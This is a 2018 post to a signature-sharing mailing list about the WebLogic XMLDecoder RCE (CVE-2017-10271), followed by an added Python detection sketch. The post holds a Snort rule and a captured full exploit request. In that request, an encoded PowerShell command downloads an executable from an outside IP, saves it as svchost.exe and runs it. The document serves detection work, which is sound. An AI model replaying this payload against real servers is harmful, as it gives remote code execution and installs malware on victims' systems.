[Emerging-Sigs] 2829182/ETPRO WEB_CLIENT Weblogic XMLDecoder RCE (CVE-2017-10271)

Packet Hack pckthck at gmail.com
Mon Jan 8 05:40:19 HST 2018


Just an FYI, 2829182 may catch some of the WSAT probes, but
we're seeing plenty of hits to just port 80:

alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Possible WSAT Exploit"; content:"POST"; http_method; content:"/wls-wsat"; http_uri; nocase; rev:1; sid:91009735;)

-----------------------------------------------------------------------
Possible WSAT Exploit
108.61.217.150 : 45382  | XX.XX.XX.XX : 80       | tcp | 2018-01-06 03:35:35 |  91009735
-----------------------------------------------------------------------
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: XX.XX.XX.XX
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
SOAPAction:
Content-Type: text/xml;charset=UTF-8
Content-Length: 1029

<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext
xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><object
class="java.lang.ProcessBuilder"><array class="java.lang.String"
length="9"><void index="0"><string>powershell.exe</string></void><void
index="1"><string>-NonI</string></void><void
index="2"><string>-W</string></void><void
index="3"><string>Hidden</string></void><void
index="4"><string>-NoP</string></void><void
index="5"><string>-Exec</string></void><void
index="6"><string>Bypass</string></void><void
index="7"><string>-Enc</string></void><void
index="8"><string>SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACIAaAB0AHQAcAA6AC8ALwAxADAAOAAuADYAMQAuADIAMQA3AC4AMQA1ADAALwBqAGEAdgBhAC4AZQB4AGUAIgAgAC0ATwB1AHQARgBpAGwAZQAgAC4ALwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIAA7ACAALgAvAHMAdgBjAGgAbwBzAHQALgBlAHgAZQAgAA==</string></void></array><void
method="start"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

--pckthck
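As an added example (not part of the post above), a small Python checker that applies the two-stage logic a defender would want here: the URI test the posted rule expresses (POST to /wls-wsat), plus inspection of the body for the WorkContext/XMLDecoder/ProcessBuilder markers visible in the capture, so that plain probes and full exploit attempts can be told apart. The sample requests are constructed; the command string is an inert placeholder rather than the original payload.

```python
import re
from dataclasses import dataclass

# Constructed sample request modelled on the capture in the post.
# The command argument is an inert placeholder, not the original payload.
SAMPLE_REQUEST = (
    "POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\n"
    "Host: 10.0.0.5\r\n"
    "Content-Type: text/xml;charset=UTF-8\r\n"
    "\r\n"
    '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
    "<soapenv:Header><work:WorkContext "
    'xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><object '
    'class="java.lang.ProcessBuilder"><array class="java.lang.String" length="1">'
    '<void index="0"><string>PLACEHOLDER_CMD</string></void></array>'
    '<void method="start"/></object></java></work:WorkContext></soapenv:Header>'
    "<soapenv:Body/></soapenv:Envelope>"
)

# Constructed benign request for comparison.
BENIGN_REQUEST = "GET /index.html HTTP/1.1\r\nHost: 10.0.0.5\r\n\r\n"

# Stage 1: the same condition as the posted rule (POST method, /wls-wsat in URI).
URI_RE = re.compile(r"^POST\s+\S*/wls-wsat", re.IGNORECASE)

# Stage 2: markers of an XMLDecoder gadget carried in a WorkContext header.
BODY_MARKERS = ("<work:WorkContext", "<java", "java.lang.ProcessBuilder", 'method="start"')


@dataclass
class Verdict:
    uri_hit: bool    # POST to /wls-wsat, as in the posted rule
    body_hit: bool   # body carries all XMLDecoder/ProcessBuilder markers
    severity: str    # "exploit", "probe" or "clean"


def inspect_request(raw: str) -> Verdict:
    """Classify one raw HTTP request (headers and body as captured)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line = head.split("\r\n", 1)[0]
    uri_hit = bool(URI_RE.match(request_line))
    body_hit = all(marker in body for marker in BODY_MARKERS)
    if uri_hit and body_hit:
        severity = "exploit"      # gadget chain present: treat as an attempt
    elif uri_hit:
        severity = "probe"        # URI only: endpoint discovery or benign WSAT use
    else:
        severity = "clean"
    return Verdict(uri_hit, body_hit, severity)
```

Running the body check alongside the URI rule keeps the sid-91009735 style match as the cheap first filter while the marker check separates real deserialization attempts from the endpoint probes the post mentions.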

